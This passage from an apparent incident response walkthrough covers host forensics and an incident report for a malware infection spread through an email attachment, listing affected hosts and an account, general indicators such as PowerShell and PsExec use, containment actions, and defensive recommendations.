• Examine Host Forensics: Analyse the isolated systems for additional indicators
of compromise, including any persistence mechanisms, other malicious tools or
further compromised accounts.

Step 6: Report Findings and Recommend Remediation

• Prepare an Incident Report: Document the incident details:

o Incident Description: Malware detected in an email attachment, leading
to execution and lateral movement across networked systems.

o Affected Accounts: izzmier (used for malicious activities).

o Affected Hosts: WIN-CLIENT-01, WIN-SERVER-03.

o Indicators of Compromise (IoCs): Malicious document, PowerShell
script execution, unauthorised PsExec usage.

o Containment Actions: Isolation of affected hosts, quarantine of
malicious files, blocking of external IP addresses.

• Recommendations:

o Review and update email security controls to prevent similar incidents in
the future.

o Provide security awareness training focused on recognising and reporting
phishing attempts.

o Conduct an organisation-wide audit for any additional infections or
compromised accounts.

o Implement stricter access controls for PowerShell execution and remote
administration tools like PsExec.
